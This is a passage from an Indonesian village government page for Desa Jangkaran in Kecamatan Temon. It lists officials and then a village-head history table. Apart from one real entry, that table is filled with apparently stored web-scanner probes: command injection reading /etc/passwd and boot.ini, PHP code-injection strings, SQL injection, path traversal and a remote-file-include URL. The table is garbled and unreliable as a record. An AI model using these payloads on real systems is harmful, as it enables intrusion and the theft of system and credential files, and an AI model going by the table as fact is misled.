Desa Jangkaran

Beranda / Kecamatan Temon / Desa Jangkaran

Desa : Jangkaran
Kecamatan : Temon
Kepala Desa : Fajar Pudiarna, ST

# Nama Jabatan
1. MURTAKIL HUMAM Lurah
2. FAJAR PUDIARNA, ST Carik
3. RADEN ARIS SUKENDAR, SPDT Panata Laksana Sarta Pangripta
4. SITI MANGISAH Danarta
5. SURYONO Jagabaya
6. SUNARDI Ulu-ulu
7. ANDI FITRIYONO Kamituwa
8. AMBAR SUGIARTI Dukuh Jangkaran
9. MUARIFUDIN Dukuh Ngentak
10. WATSIK BILLAH Dukuh Ngelak
11. MARYAMAH Dukuh Kledekan Lor
12. ISWANTORO Dukuh Kledekan Kidul
13. SUPANDI Dukuh Nglawang
14. RISDIANTO Dukuh Pasir Kadilangu
15. NASIR BINTORO Dukuh PASIR MENDIT

# Nama Jabatan
1. SUYADI Ketua
2. IBNU BASHORI Wakil Ketua
3. Sekretaris
4. DWI RIAU WATI Ketua Bidang Penyelenggaraan Pemerintah Kalurahan
5. R. RITWAN Ketua Bidang Pembangunan Kalurahan dan Pemberdayaa

# Nama Kepala Desa Awal Masa Jabatan Akhir Masa Jabatan
1. ZAP ZAP
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41. ZAP ZAP
42. ZAP ZAP
43. ZAP " ZAP
44. ZAP "+re ZAP
45. ZAP ";pr ZAP
46. ZAP "> ZAP
47. ZAP "> ZAP
48. 123 "> 123
49. ZAP ${@p ZAP
50. ZAP ) ZAP
51. ZAP + ZAP
52. ZAP +res ZAP
53. ZAP .... ZAP
54. ZAP ../. ZAP
55. ZAP ../. ZAP
56. 123 .sys 123
57. 123 .sys 123
58. 123 .sys 123
59. 123 .sys 123
60. ZAP //36 ZAP
61. ZAP /etc ZAP
62. ZAP 0W45 ZAP
63. 123 123 ">
64. 123 123 ">
65. 123 123 .sys
66. 123 123 .sys
67. 123 123 .sys
68. 123 123 .sys
69. |type c:oot.ini| 123 123
70. ;cat /etc/passwd; 123 123
71. `cat /etc/passwd` 123 123
72. |cat /etc/passwd 123 123
73. |type c:oot.ini 123 123
74. |type c:oot.ini.htm| 123 123
75. |type c:oot.ini.html| 123 123
76. `cat /etc/passwd`; 123 123
77. :system("cat /etc/passwd"). 123 123
78. |cat /etc/passwd.html| 123 123
79. |cat /etc/passwd| 123 123
80. |cat /etc/passwd.htm| 123 123
81. |cat /etc/passwd| 123 123
82. system("cat /etc/passwd"); 123 123
83. .system("cat /etc/passwd"). 123 123
84. :system("cat /etc/passwd"); 123 123
85. ;system("cat /etc/passwd"). 123 123
86. ;system("cat /etc/passwd"); 123 123
87. |cat /etc/passwd.dat| 123 123
88. |type c:oot.ini| 123 123
89. system("type c:oot.ini"); 123 123
90. :system("cat /etc/passwd"); 123 123
91. |cat /etc/passwd.dat| 123 123
92. .system("cat /etc/passwd"). 123 123
93. system("cat /etc/passwd"); 123 123
94. |cat /etc/passwd.htm| 123 123
95. |cat /etc/passwd| 123 123
96. |cat /etc/passwd| 123 123
97. |cat /etc/passwd.html| 123 123
98. |cat /etc/passwd 123 123
99. ;system("cat /etc/passwd") 123 123
100. ;type c:oot.ini; 123 123
101. .system("type c:oot.ini"). 123 123
102. :system("type c:oot.ini"); 123 123
103. ;system("type c:oot.ini"). 123 123
104. |type c:oot.ini.dat| 123 123
105. ;system("type c:oot.ini") 123 123
106. ;system("type c:oot.ini"); 123 123
107. `type c:oot.ini` 123 123
108. :system("type c:oot.ini"). 123 123
109. `type c:oot.ini`; 123 123
110. ;system("cat /etc/passwd") 123 123
111. ;system("cat /etc/passwd"). 123 123
112. ;type c:oot.ini; 123 123
113. "> 123 123
114. ;cat /etc/passwd; 123 123
115. `cat /etc/passwd` 123 123
116. 123" 123 123
117. ;system("cat /etc/passwd"); 123 123
118. `cat /etc/passwd`; 123 123
119. :system("cat /etc/passwd"). 123 123
120. :system("type c:oot.ini"); 123 123
121. |type c:oot.ini 123 123
122. `type c:oot.ini` 123 123
123. |type c:oot.ini.htm| 123 123
124. |type c:oot.ini| 123 123
125. |type c:oot.ini.dat| 123 123
126. |type c:oot.ini| 123 123
127. 123 123
128. system("type c:oot.ini"); 123 123
129. .system("type c:oot.ini"). 123 123
130. 123" 123 123
131. ;system("type c:oot.ini"). 123 123
132. 123 123
133. |type c:oot.ini.html| 123 123
134. http://uniscan.sourceforge.net/c.txt? 123 123
135. ;system("type c:oot.ini"); 123 123
136. `type c:oot.ini`; 123 123
137. :system("type c:oot.ini"). 123 123
138. ;system("type c:oot.ini") 123 123
139. http://uniscan.sourceforge.net/c.txt? 123 123
140. 123" 123 123
141. "> 123 123
142. 123 123 123"
143. 123 123 123"
144. 123 123 123"
145. 123 123 :sys
146. 123 123 :sys
147. 123 123 :sys
148. 123 123 :sys
149. 123 123 :sys
150. 123 123 :sys
151. 123 123 :sys
152. 123 123 :sys
153. 123 123 ;cat
154. 123 123 ;cat
155. 123 123 ;sys
156. 123 123 ;sys
157. 123 123 ;sys
158. 123 123 ;sys
159. 123 123 ;sys
160. 123 123 ;sys
161. 123 123 ;sys
162. 123 123 ;sys
163. 123 123 ;sys
164. 123 123 ;sys
165. 123 123 ;sys
166. 123 123 ;sys
167. 123 123 ;typ
168. 123 123 ;typ
169. 123 123
170. 123 123
171. 123 123 http
172. 123 123 http
173. 123 123 syst
174. 123 123 syst
175. 123 123 syst
176. 123 123 syst
177. 123 123 `cat
178. 123 123 `cat
179. 123 123 `cat
180. 123 123 `cat
181. 123 123 `typ
182. 123 123 `typ
183. 123 123 `typ
184. 123 123 `typ
185. 123 123 |cat
186. 123 123 |cat
187. 123 123 |cat
188. 123 123 |cat
189. 123 123 |cat
190. 123 123 |cat
191. 123 123 |cat
192. 123 123 |cat
193. 123 123 |cat
194. 123 123 |cat
195. 123 123 |cat
196. 123 123 |cat
197. 123 123 |typ
198. 123 123 |typ
199. 123 123 |typ
200. 123 123 |typ
201. 123 123 |typ
202. 123 123 |typ
203. 123 123 |typ
204. 123 123 |typ
205. 123 123 |typ
206. 123 123 |typ
207. 123 123 |typ
208. 123 123 |typ
209. 123 123" 123
210. 123 123" 123
211. 123 123" 123
212. MURTAKIL HUMAM 2015 2021
213. ZAP 3638 ZAP
214. 123 :sys 123
215. 123 :sys 123
216. 123 :sys 123
217. 123 :sys 123
218. 123 :sys 123
219. 123 :sys 123
220. 123 :sys 123
221. 123 :sys 123
222. ZAP ; ZAP
223. 123 ;cat 123
224. 123 ;cat 123
225. ZAP ;pri ZAP
226. 123 ;sys 123
227. 123 ;sys 123
228. 123 ;sys 123
229. 123 ;sys 123
230. 123 ;sys 123
231. 123 ;sys 123
232. 123 ;sys 123
233. 123 ;sys 123
234. 123 ;sys 123
235. 123 ;sys 123
236. 123 ;sys 123
237. 123 ;sys 123
238. 123 ;typ 123
239. 123 ;typ 123
240. ZAP < ZAP ZAP
406. ZAP ZAP ZAP
407. ZAP ZAP ZAP
408. ZAP ZAP ZAP
409. ZAP ZAP ZAP
410. ZAP ZAP ZAP
411. ZAP ZAP ZAP
412. ZAP ZAP ZAP
413. ZAP ZAP ZAP
414. ZAP ZAP ZAP
415. ZAP ZAP ZAP
416. ZAP ZAP ZAP
417. ZAP ZAP ZAP
418. ZAP ZAP
419. ">< ZAP ZAP
420. 0W45pz4p ZAP ZAP
421. ZAP ZAP
422. zApPX3sS ZAP ZAP
423. ZAP ZAP ZAP
424. ZAP ZAP ZAP
425. ZAP ZAP ZAP
426. ZAP ZAP ZAP
427. ZAP ZAP ZAP
428. ZAP ZAP ZAP
429. ZAP ZAP ZAP
430. ZAP ZAP ZAP
431. ZAP) UNION ALL select NULL -- ZAP ZAP
432. ZAP" UNION ALL select NULL -- ZAP ZAP
433. ZAP UNION ALL select NULL -- ZAP ZAP
434. ZAP OR 1=1 -- ZAP ZAP
435. ZAP AND 1=2 -- ZAP ZAP
436. ZAP OR 1=1 -- ZAP ZAP
437. ZAP AND 1=2 -- ZAP ZAP
438. ZAP AND 1=1 -- ZAP ZAP
439. ZAP ZAP ZAP
440. ZAP) ZAP ZAP
441. ) ZAP ZAP
442. ZAP ZAP ZAP
443. ZAP ZAP ZAP
444. " ZAP ZAP
445. ZAP" ZAP ZAP
446. ; ZAP ZAP
447. ZAP; ZAP ZAP
448. ZAP ZAP ZAP
449. ZAP ZAP ZAP
450. ZAP ZAP ZAP
451. ZAP ZAP ZAP
452. ZAP ZAP
453. ZAP ZAP ZAP
454. ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(10 ZAP ZAP
455. ZAP ZAP ZAP
456. ZAP ZAP ZAP
457. c:/Windows/system.ini ZAP ZAP
458. ZAP ZAP ZAP
459. ZAP ZAP ZAP
460. ZAP ZAP ZAP
461. ZAP ZAP ZAP
462. ZAP ZAP ZAP
463. ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(1 ZAP ZAP
464. ;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101 ZAP ZAP
465. "+response.write([100,000*100,000)+" ZAP ZAP
466. ZAP ZAP ZAP
467. ZAP ZAP ZAP
468. ZAP ZAP ZAP
469. ZAP ZAP ZAP
470. ZAP ZAP ZAP
471. ZAP ZAP ZAP
472. ZAP ZAP ZAP
473. response.write(100,000*100,000) ZAP ZAP
474. +response.write({0}*{1})+ ZAP ZAP
475. ZAP ZAP ZAP
476. ZAP ZAP ZAP
477. ZAP ZAP ZAP
478. http://www.google.com:80/ ZAP ZAP
479. http://www.google.com ZAP ZAP
480. http://www.google.com/search?q=OWASP%20ZAP ZAP ZAP
481. ZAP ZAP ZAP
482. http://www.google.com:80/search?q=OWASP%20ZAP ZAP ZAP
483. www.google.com/ ZAP ZAP
484. www.google.com:80/ ZAP ZAP
485. www.google.com ZAP ZAP
486. www.google.com/search?q=OWASP%20ZAP ZAP ZAP
487. http://www.google.com/ ZAP ZAP
488. c:/ ZAP ZAP
489. ZAP ZAP ZAP
490. ../../../../../../../../../../../../../../../../Windows/system.ini ZAP ZAP
491. c:Windowssystem.ini ZAP ZAP
492. ................................Windowssystem.ini ZAP ZAP
493. ZAP ZAP ZAP
494. /etc/passwd ZAP ZAP
495. ../../../../../../../../../../../../../../../../etc/passwd ZAP ZAP
496. ZAP ZAP ZAP
497. ZAP ZAP ZAP
498. ZAP ZAP ZAP
499. www.google.com:80/search?q=OWASP%20ZAP ZAP ZAP
500. ZAP ZAP ZAP"
501. ZAP ZAP ZAP"
502. ZAP ZAP ZAP"
503. ZAP ZAP ZAP"
504. ZAP ZAP ZAP"
505. ZAP ZAP ZAP"
506. ZAP ZAP ZAP"
507. ZAP ZAP ZAP"
508. ZAP ZAP ZAP"
509. ZAP ZAP ZAP"
510. ZAP ZAP ZAP"
511. ZAP ZAP ZAP"
512. ZAP ZAP ZAP%
513. ZAP ZAP ZAP&
514. ZAP ZAP ZAP&
515. ZAP ZAP ZAP&
516. ZAP ZAP ZAP&
517. ZAP ZAP ZAP)
518. ZAP ZAP ZAP)
519. ZAP ZAP ZAP;
520. ZAP ZAP ZAP;
521. ZAP ZAP ZAP;
522. ZAP ZAP ZAP;
523. ZAP ZAP ZAP;
524. ZAP ZAP ZAP;
525. ZAP ZAP ZAP;
526. ZAP ZAP zApP
527. ZAP ZAP ZAP|
528. ZAP ZAP ZAP|
529. ZAP ZAP \363
530. ZAP ZAP |
531. ZAP ZAP" ZAP
532. ZAP ZAP" ZAP
533. ZAP ZAP" ZAP
534. ZAP ZAP" ZAP
535. ZAP ZAP" ZAP
536. ZAP ZAP" ZAP
537. ZAP ZAP" ZAP
538. ZAP ZAP" ZAP
539. ZAP ZAP" ZAP
540. ZAP ZAP" ZAP
541. ZAP ZAP" ZAP
542. ZAP ZAP" ZAP
543. ZAP ZAP% ZAP
544. ZAP ZAP& ZAP
545. ZAP ZAP& ZAP
546. ZAP ZAP& ZAP
547. ZAP ZAP& ZAP
548. ZAP ZAP) ZAP
549. ZAP ZAP) ZAP
550. ZAP ZAP; ZAP
551. ZAP ZAP; ZAP
552. ZAP ZAP; ZAP
553. ZAP ZAP; ZAP
554. ZAP ZAP; ZAP
555. ZAP ZAP; ZAP
556. ZAP ZAP; ZAP
557. ZAP zApP ZAP
558. ZAP ZAP| ZAP
559. ZAP ZAP| ZAP
560. ZAP \363 ZAP
561. 123 `cat 123
562. 123 `cat 123
563. 123 `cat 123
564. 123 `cat 123
565. 123 `typ 123
566. 123 `typ 123
567. 123 `typ 123
568. 123 `typ 123
569. ZAP | ZAP
570. 123 |cat 123
571. 123 |cat 123
572. 123 |cat 123
573. 123 |cat 123
574. 123 |cat 123
575. 123 |cat 123
576. 123 |cat 123
577. 123 |cat 123
578. 123 |cat 123
579. 123 |cat 123
580. 123 |cat 123
581. 123 |cat 123
582. 123 |typ 123
583. 123 |typ 123
584. 123 |typ 123
585. 123 |typ 123
586. 123 |typ 123
587. 123 |typ 123
588. 123 |typ 123
589. 123 |typ 123
590. 123 |typ 123
591. 123 |typ 123
592. 123 |typ 123
593. 123 |typ 123